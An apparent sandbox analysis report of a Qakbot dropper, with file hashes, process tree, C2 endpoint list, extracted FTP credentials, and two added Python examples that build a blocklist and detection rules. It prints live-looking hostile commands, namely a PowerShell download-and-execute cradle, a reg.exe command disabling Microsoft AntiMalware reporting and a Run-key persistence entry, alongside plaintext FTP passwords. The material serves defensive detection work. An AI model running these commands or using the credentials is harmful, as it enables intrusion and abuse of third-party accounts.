Analysis

max time kernel: 149s
max time network: 46s
platform: windows7_x64
resource: win7v20201028
submitted: 28-12-2020 18:58

Static task: static1
Behavioral task: behavioral1 (sample aatnj.exe, resource win7v20201028)
Behavioral task: behavioral2 (sample aatnj.exe, resource win10v20201028)
The details on this page are from behavioral1, the Windows 7 x64 run.

General

Target: aatnj.exe
Size: 39.5MB
MD5: 2cf766692a75309734b08b3bd8cc36df
SHA1: a003224582db124237e8c879d795aefe8d23b22b
SHA256: 1ee6f8e9bbc53afa81c39326d5748c6c4322d2501c42adcb34f5b71bc34ae48b
SHA512: a28bf5af4c30152bd89d23e5295e9a6faa23eac6f312d7841bfb4664fe725bf42fed2fe4bb65c164709d6aa98a5ff66cbb78ed86396be975d2aeb1386afcda2c
Malware Config

Extracted: https://www.allens-treasure-house.com/books_files/001.ps1
(the URL fetched by the powershell.exe download cradle in the process tree)

Extracted: qakbot
1513068643

FTP credentials in the extracted config:
Protocol: ftp - Host: 66.96.133.9 - Port: 21 - Username: help - Password: eT5TerAcnFe6~
Protocol: ftp - Host: 174.123.38.58 - Port: 21 - Username: log@thebrainregistry.com - Password: 4BQ1MeeRAwNZEVu
Protocol: ftp - Host: 61.221.12.26 - Port: 21 - Username: logger@ostergift.com - Password: 346HZGCMlwecz9S
Protocol: ftp - Host: 67.222.137.18 - Port: 21 - Username: logger@grupocrepusculo.net - Password: p4a8k6fE1FtA3pR
Protocol: ftp - Host: 107.6.152.61 - Port: 21 - Username: logger@trussedup.com - Password: RoP4Af0RKAAQ74V

C2 endpoints (ip:port) in the extracted config:
1.1.192.123:443
160.3.251.154:995
75.127.141.50:995
108.49.159.2:990
96.70.92.177:1194
70.184.255.4:443
73.171.50.80:443
98.201.98.191:443
104.159.220.171:443
100.8.244.14:443
66.76.136.65:443
24.45.150.163:443
216.201.159.118:443
66.76.136.65:1194
160.3.251.154:443
27.3.93.3:443
58.108.210.165:995
96.70.92.177:993
108.58.44.6:443
117.195.243.76:443
105.229.108.111:443
209.212.131.66:443
75.83.30.135:443
68.173.55.51:443
70.118.18.242:443
108.35.199.8:443
75.143.231.200:443
173.72.96.50:995
73.76.201.210:443
173.72.96.50:443
174.57.88.157:443
76.4.219.37:995
66.222.48.40:443
24.45.189.76:995
98.163.53.175:993
86.27.41.234:443
71.190.202.120:443
108.49.159.2:995
71.85.72.9:443
189.170.52.201:443
50.192.121.62:6881
47.223.78.244:993
98.163.220.232:443
98.191.105.101:995
216.251.203.253:443
108.49.159.2:993
192.158.217.32:21
132.206.59.132:443
192.158.217.32:443
73.183.141.219:443
151.202.46.113:443
47.143.83.172:443
198.57.88.73:443
66.189.228.49:995
98.20.35.129:443
71.207.137.218:443
132.251.250.58:443
71.194.162.118:443
108.214.190.141:22
68.228.32.197:2222
174.79.244.142:2222
73.171.208.223:443
73.255.36.173:443
47.22.21.180:995
73.251.254.127:443
24.194.177.157:995
73.198.142.130:995
76.188.197.130:443
75.167.243.66:443
100.36.37.26:995
104.137.5.218:443
173.49.95.92:443
136.61.161.102:443
98.191.105.101:993
107.184.242.19:443
73.250.49.41:443
174.81.187.84:443
73.84.126.181:443
65.218.249.250:443
24.14.39.10:443
100.1.178.79:6882
78.168.137.109:443
108.58.129.90:443
76.95.241.114:443
41.200.147.155:443
75.97.144.106:995
95.15.254.82:443
67.247.220.195:443
98.102.37.174:2222
72.250.217.132:443
41.249.172.38:443
70.184.181.88:443
71.84.92.193:995
73.77.96.186:443
108.35.21.79:443
108.58.129.90:995
151.202.46.113:995
82.34.193.149:443
88.252.146.139:995
68.83.130.163:443
73.235.172.45:443
24.45.230.32:443
24.77.124.178:443
184.155.19.94:2222
173.247.186.90:6882
78.164.51.158:443
125.25.133.71:995
72.251.9.200:443
38.93.152.30:443
172.87.188.2:443
73.171.208.63:443
5.220.175.152:2222
98.121.199.219:443
50.198.141.161:2222
174.16.153.98:995
173.28.239.79:443
184.186.73.221:443
170.185.153.17:2222
118.71.69.27:443
70.57.113.151:443
170.185.126.17:443
216.51.79.71:443
75.64.168.85:443
216.228.55.13:443
73.8.165.2:443
209.239.101.72:443
168.10.142.2:443
170.215.211.14:443
72.20.132.2:443
70.189.67.15:443
71.232.248.52:443
68.199.118.150:2222
165.138.13.253:995
100.35.50.18:2222
208.49.151.160:443
69.245.219.31:443
50.206.74.2:443
76.183.233.1:443
47.201.100.228:443
108.45.105.144:443
142.112.229.81:2222
65.35.242.188:443
69.157.60.221:2222
173.48.159.185:443
47.208.196.196:443
107.77.224.127:443
156.198.69.177:443
24.45.189.76:443
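Several hosts in the list above appear more than once on different ports (108.49.159.2 on 990, 993 and 995; 160.3.251.154 on 443 and 995; 66.76.136.65 on 443 and 1194), so a blocklist built from it should be keyed by host with a set of ports rather than by raw ip:port string. The following is an added example, not part of the sandbox report: it parses a subset of the endpoints above in the same one-per-line form, groups them per host, and matches constructed Zeek conn.log rows against them. The "medium" confidence tier for a listed IP on an unlisted port is an assumption of mine (the list is a snapshot of one config on one day), not something the report states.

```python
# Added example, not part of the report: per-host blocklist from the flattened
# ip:port list above, matched against constructed Zeek conn.log rows.
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# A subset of the endpoints listed above, copied in the same one-per-line form.
C2_TEXT = """
1.1.192.123:443
160.3.251.154:995
160.3.251.154:443
108.49.159.2:990
108.49.159.2:995
108.49.159.2:993
66.76.136.65:443
66.76.136.65:1194
192.158.217.32:21
192.158.217.32:443
108.214.190.141:22
68.228.32.197:2222
50.192.121.62:6881
"""


def parse_c2_list(text: str) -> Dict[str, Set[int]]:
    """Group endpoints by IP: several entries in the report are one host on several ports."""
    by_ip: Dict[str, Set[int]] = defaultdict(set)
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ip, _, port = line.rpartition(":")
        by_ip[ip].add(int(port))
    return dict(by_ip)


# Constructed Zeek conn.log rows (tab-separated):
# ts  uid  id.orig_h  id.orig_p  id.resp_h  id.resp_p  proto
CONN_LOG = (
    "1609182000.1\tCabc1\t10.0.0.5\t49152\t160.3.251.154\t995\ttcp\n"
    "1609182001.2\tCabc2\t10.0.0.5\t49153\t108.49.159.2\t443\ttcp\n"
    "1609182002.3\tCabc3\t10.0.0.7\t49154\t93.184.216.34\t443\ttcp\n"
    "1609182003.4\tCabc4\t10.0.0.9\t49155\t192.158.217.32\t21\ttcp\n"
)


def match_conn_log(log: str, c2: Dict[str, Set[int]]) -> List[Tuple[str, str, int, str]]:
    """Return (uid, resp_h, resp_p, confidence) for every row whose responder is a listed host.

    'high'   = the exact ip:port pair is in the extracted config.
    'medium' = the IP is listed but on a port the config does not name (assumption:
               the operator may rotate ports, so the host alone is still worth a look).
    """
    hits: List[Tuple[str, str, int, str]] = []
    for row in log.splitlines():
        if not row or row.startswith("#"):
            continue
        fields = row.split("\t")
        uid, resp_h, resp_p = fields[1], fields[4], int(fields[5])
        ports = c2.get(resp_h)
        if ports is None:
            continue
        hits.append((uid, resp_h, resp_p, "high" if resp_p in ports else "medium"))
    return hits


if __name__ == "__main__":
    blocklist = parse_c2_list(C2_TEXT)
    for hit in match_conn_log(CONN_LOG, blocklist):
        print(hit)
```

Feeding the full list from the page into `C2_TEXT` works unchanged; the parser only needs one `ip:port` per line.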
Signatures

Blocklisted process makes network request (1 IoC)
  flow 6: pid 644 powershell.exe

Executes dropped EXE (2 IoCs)
  pid 1376 qcubrqe.exe
  pid 864 qcubrqe.exe

Loads dropped DLL (2 IoCs)
  pid 292 aatnj.exe (2 hits)

Adds Run key to start application (2 TTPs, 1 IoC)
  explorer.exe (pid 656): Set value (str)
  \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\eetqscnq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Qcubrqec\\qcubrqe.exe\""
  The writer is the C:\Windows\SysWOW64\explorer.exe instance that qcubrqe.exe spawned and wrote into (see WriteProcessMemory below and the process tree), not the desktop shell Explorer.EXE (pid 1268).

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (72 IoCs)
  pid process: 292 aatnj.exe; 1540 aatnj.exe (2 hits); 1376 qcubrqe.exe; 864 qcubrqe.exe; 644 powershell.exe (2 hits); 864 qcubrqe.exe; 656 explorer.exe (2 hits); 1128 taskhost.exe; 1232 Dwm.exe; 1268 Explorer.EXE; 292 aatnj.exe; 644 powershell.exe; 1476 conhost.exe; 656 explorer.exe (3 hits); 2004 cmd.exe; 1940 conhost.exe; 2016 PING.EXE; 656 explorer.exe for all remaining hits

Suspicious behavior: MapViewOfSection (1 IoC)
  pid 1376 qcubrqe.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  pid 644 powershell.exe, Token: SeDebugPrivilege

Suspicious use of FindShellTrayWindow (4 IoCs)
  pid 1268 Explorer.EXE (4 hits)

Suspicious use of SendNotifyMessage (4 IoCs)
  pid 1268 Explorer.EXE (4 hits)

Suspicious use of WriteProcessMemory (60 IoCs)
  writer -> target (hits):
  292 aatnj.exe -> 1540 aatnj.exe (4)
  292 aatnj.exe -> 1376 qcubrqe.exe (4)
  292 aatnj.exe -> 272 reg.exe (4)
  292 aatnj.exe -> 644 powershell.exe (4)
  292 aatnj.exe -> 2004 cmd.exe (4)
  1376 qcubrqe.exe -> 864 qcubrqe.exe (4)
  1376 qcubrqe.exe -> 656 explorer.exe (5)
  2004 cmd.exe -> 2016 PING.EXE (4)
  656 explorer.exe -> 1128 taskhost.exe (3)
  656 explorer.exe -> 1232 Dwm.exe (3)
  656 explorer.exe -> 1268 Explorer.EXE (3)
  656 explorer.exe -> 292 aatnj.exe (3)
  656 explorer.exe -> 644 powershell.exe (3)
  656 explorer.exe -> 1476 conhost.exe (3)
  656 explorer.exe -> 2004 cmd.exe (3)
  656 explorer.exe -> 1940 conhost.exe (3)
  656 explorer.exe -> 2016 PING.EXE (3)
  The groups of four from a parent into its own child are the ordinary write-on-create pattern (the child is spawned suspended and its memory filled before it runs). The writes from 656 explorer.exe into taskhost.exe, Dwm.exe and the shell Explorer.EXE target processes that existed before the sample ran, which is why those three appear as top-level entries in the process tree below.
Processes (parent -> child; depth shown by indentation, pids taken from the signature tables above)

C:\Windows\Explorer.EXE (pid 1268)
  command line: C:\Windows\Explorer.EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

  C:\Users\Admin\AppData\Local\Temp\aatnj.exe (pid 292)
    command line: "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\aatnj.exe (pid 1540)
      command line: "C:\Users\Admin\AppData\Local\Temp\aatnj.exe" /C
      - Suspicious behavior: EnumeratesProcesses

    C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe (pid 1376)
      command line: C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe (pid 864)
        command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe" /C
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses

      C:\Windows\SysWOW64\explorer.exe (pid 656)
        command line: C:\Windows\SysWOW64\explorer.exe
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe (pid 272)
      command line: C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
      (SpyNetReporting = 0 turns off the Microsoft AntiMalware SpyNet/MAPS cloud-reporting opt-in)

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 644)
      command line: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\dsgqusyinllxtjzempwebswphyar.txt'"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe (pid 2004)
      command line: "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
      (ping to 127.0.0.1 is used as a delay, then the dropper's own file is overwritten with the contents of calc.exe; after the run a file named aatnj.exe is still in Temp, but hashing it yields calc.exe, not the submitted sample)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\PING.EXE (pid 2016)
        command line: ping.exe -n 6 127.0.0.1
        - Runs ping.exe
        - Suspicious behavior: EnumeratesProcesses

Processes the report lists at top level (each was written to by 656 explorer.exe, see WriteProcessMemory above):

C:\Windows\system32\Dwm.exe (pid 1232)
  command line: "C:\Windows\system32\Dwm.exe"
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\taskhost.exe (pid 1128)
  command line: "taskhost.exe"
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\conhost.exe (pids 1476 and 1940; the report does not say which command line belongs to which)
  command line: \??\C:\Windows\system32\conhost.exe "-19007207921145265970128245128521110818641071818068179498888-1386010726526966880"
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe "-1008628566724299117529814571568871720502565179-1509066441155205275116615787"
  - Suspicious behavior: EnumeratesProcesses
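The command lines in the tree above are the parts of this run that survive as host telemetry, so they are what a detection engineer would turn into rules: reg.exe zeroing SpyNetReporting, a powershell.exe IEX/DownloadString cradle, cmd.exe using ping as a sleep before overwriting its parent's image, a Run key pointing into AppData\Roaming, and explorer.exe started from a binary under AppData\Roaming. The following is an added example, not part of the sandbox report: the five rules run over constructed Sysmon-style process-creation and registry-set records. The malicious command lines are copied from the tree above; the event schema, the pids on the benign records and the benign look-alikes themselves are my own constructions.

```python
# Added example, not part of the report: detection rules derived from the process
# tree above, run over constructed Sysmon-style records. Malicious command lines
# are copied from the report; the Event schema and benign records are invented.
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class Event:
    """Minimal Sysmon-like record. kind is 'process' (EID 1) or 'registry' (EID 13)."""
    kind: str
    pid: int
    image: str                  # acting process (the writer, for registry events)
    cmdline: str = ""
    parent_image: str = ""
    target_object: str = ""     # registry events: full path of the value written
    details: str = ""           # registry events: data written


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_spynet_reporting_disabled(ev: Event) -> bool:
    """reg.exe setting Microsoft AntiMalware / SpyNet / SpyNetReporting to 0."""
    if ev.kind != "process" or _basename(ev.image) != "reg.exe":
        return False
    cl = ev.cmdline.lower()
    return ("\\microsoft antimalware\\spynet" in cl and "spynetreporting" in cl
            and re.search(r'/d\s+"?0"?(\s|$)', cl) is not None)


def rule_powershell_download_cradle(ev: Event) -> bool:
    """powershell.exe evaluating a string it downloads (IEX + Net.WebClient/DownloadString)."""
    if ev.kind != "process" or _basename(ev.image) != "powershell.exe":
        return False
    cl = ev.cmdline.lower()
    evaluates = re.search(r"\biex\b|invoke-expression", cl) is not None
    downloads = "downloadstring" in cl or "net.webclient" in cl
    return evaluates and downloads


_PING_DELAY = re.compile(r"ping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1", re.I)
_REDIRECT = re.compile(r'>\s*(?:"([^"]+)"|(\S+))')


def rule_ping_delay_self_overwrite(ev: Event) -> bool:
    """cmd.exe sleeping via ping 127.0.0.1, then redirecting output over its parent's own image."""
    if ev.kind != "process" or _basename(ev.image) != "cmd.exe":
        return False
    if not _PING_DELAY.search(ev.cmdline):
        return False
    m = _REDIRECT.search(ev.cmdline)
    if not m:
        return False
    target = (m.group(1) or m.group(2)).lower()
    return target == ev.parent_image.lower()


def rule_run_key_into_roaming_appdata(ev: Event) -> bool:
    """Run-key value whose data is an executable under AppData/Roaming."""
    if ev.kind != "registry":
        return False
    if "\\software\\microsoft\\windows\\currentversion\\run\\" not in ev.target_object.lower():
        return False
    data = ev.details.strip().strip('"').lower()
    return "\\appdata\\roaming\\" in data and data.endswith(".exe")


def rule_explorer_spawned_from_roaming(ev: Event) -> bool:
    """explorer.exe started by a binary under AppData/Roaming (the injection host in this report)."""
    if ev.kind != "process" or _basename(ev.image) != "explorer.exe":
        return False
    return "\\appdata\\roaming\\" in ev.parent_image.lower()


RULES: List[Callable[[Event], bool]] = [
    rule_spynet_reporting_disabled, rule_powershell_download_cradle,
    rule_ping_delay_self_overwrite, rule_run_key_into_roaming_appdata,
    rule_explorer_spawned_from_roaming,
]


def evaluate(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every rule each event trips, in event order."""
    return [(rule.__name__, ev.pid) for ev in events for rule in RULES if rule(ev)]


_DROPPER = r"C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
_STAGE2 = r"C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe"

SAMPLE_EVENTS = [  # constructed records; malicious command lines copied from the report
    Event("process", 272, r"C:\Windows\system32\reg.exe",
          r'C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"',
          parent_image=_DROPPER),
    Event("process", 644, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'''powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\dsgqusyinllxtjzempwebswphyar.txt'"''',
          parent_image=_DROPPER),
    Event("process", 2004, r"C:\Windows\SysWOW64\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"',
          parent_image=_DROPPER),
    Event("process", 656, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe",
          parent_image=_STAGE2),
    Event("registry", 656, r"C:\Windows\SysWOW64\explorer.exe",
          target_object=r"HKU\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\eetqscnq",
          details='"' + _STAGE2 + '"'),
    # benign look-alikes (invented) that must not fire
    Event("process", 3001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoProfile -Command Get-Process", parent_image=r"C:\Windows\explorer.exe"),
    Event("process", 3002, r"C:\Windows\System32\cmd.exe",
          "cmd.exe /c ping -n 3 127.0.0.1 & echo done", parent_image=r"C:\Program Files\Vendor\build.exe"),
    Event("registry", 3003, r"C:\Program Files\Vendor\setup.exe",
          target_object=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
          details=r'"C:\Program Files\Vendor\updater.exe"'),
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name:36} pid {pid}")
```

The self-overwrite rule deliberately requires the redirect target to equal the parent's image path; a plain "ping -n N 127.0.0.1" sleep is common in legitimate batch files and would be noisy on its own.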
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrq.dat
  MD5    205dccc6f14473f9d0f627dd82b990e6
  SHA1   b0da5441d278113fe1325b3abf23b31e9e695476
  SHA256 9a1b7b5484d936382438484e1be23cfe4724f2de237d82c705cbe5215d722c42
  SHA512 0d286fc012f951e1155ed985d8ea267a6bcf238c6f93bf0f928f4fba3d0d6a26c5f40472baba63a5fdecdf9acd6fb6b186f695bf2a6dc37f15bdc34e9c2b6196

C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
(the report lists this file five times, three as C:\Users\... and two as \Users\..., all with identical hashes; it is the executable the Run key points to, and its hashes differ from the submitted aatnj.exe, so hunt on both sets)
  MD5    e8023ba3e33238f7d8afcf9edcb66dd5
  SHA1   103806275b0bf9d81f5a160fff610977155f2bf5
  SHA256 bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac
  SHA512 6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1
Memory dumps (dump name is pid-sequence; region and size where a region was dumped)

memory/272-7     0x0000000000000000                       mapping.dmp
memory/292-26    0x0000000000580000-0x0000000000581000    4KB
memory/644-9     0x0000000000000000                       mapping.dmp
memory/644-12    0x000007FEF5DD0000-0x000007FEF67BC000    9.9MB
memory/644-14    0x0000000001D90000-0x0000000001D91000    4KB
memory/644-15    0x000000001AE10000-0x000000001AE11000    4KB
memory/644-16    0x0000000001F70000-0x0000000001F71000    4KB
memory/644-17    0x0000000001ED0000-0x0000000001ED1000    4KB
memory/644-24    0x000000001B8A0000-0x000000001B8A1000    4KB
memory/644-28    0x00000000021B0000-0x00000000021B1000    4KB
memory/644-31    0x0000000002600000-0x0000000002601000    4KB
memory/644-43    0x0000000002570000-0x0000000002571000    4KB
memory/644-44    0x00000000026C0000-0x00000000026C1000    4KB
memory/656-20    0x0000000000000000                       mapping.dmp
memory/864-11    0x0000000000000000                       mapping.dmp
memory/864-18    0x0000000002480000-0x0000000002491000    68KB
memory/1128-22   0x0000000001B70000-0x0000000001B71000    4KB
memory/1376-6    0x0000000000000000                       mapping.dmp
memory/1376-19   0x0000000000E90000-0x0000000000EF8000    416KB
memory/1540-2    0x0000000000000000                       mapping.dmp
memory/1540-3    0x0000000002480000-0x0000000002491000    68KB
memory/2004-45   0x0000000000000000                       mapping.dmp
memory/2004-48   0x0000000000000000                       mapping.dmp
memory/2016-46   0x0000000000000000                       mapping.dmp
memory/2016-51   0x0000000000000000                       mapping.dmp

The two "/C" child processes (1540 aatnj.exe and 864 qcubrqe.exe) each have a 68KB region dumped at the same address, 0x2480000-0x2491000; those two dumps are the first ones to compare when looking for the unpacked stage.